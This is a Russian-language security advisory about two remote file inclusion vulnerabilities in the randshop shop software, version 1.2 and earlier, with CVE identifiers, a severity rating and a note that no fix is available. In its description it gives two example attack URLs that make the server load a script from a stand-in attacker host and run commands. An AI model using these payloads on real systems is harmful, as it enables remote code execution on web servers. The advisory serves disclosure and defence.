Дата публикации: | 06.07.2006 |
Дата изменения: | 06.04.2009 |
Всего просмотров: | 2625 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2006-3537 CVE-2006-3375 CVE-2006-3374 |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | randshop 1.x |
Уязвимые версии: randshop 1.2 и более ранние версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”dateiPfad” в сценарии includes/header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://[target]/[path]/includes/header.inc.php? dateiPfad=http://[attacker]/cmd.txt?&cmd=ls 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”incl” в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://victim/randshop/index.php?incl=http://evilscript? URL производителя: www.randshop.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: |
randshop <= 1.1.1 Remote File Inclusion Vulnerability file include exploits in randshop v1.2 |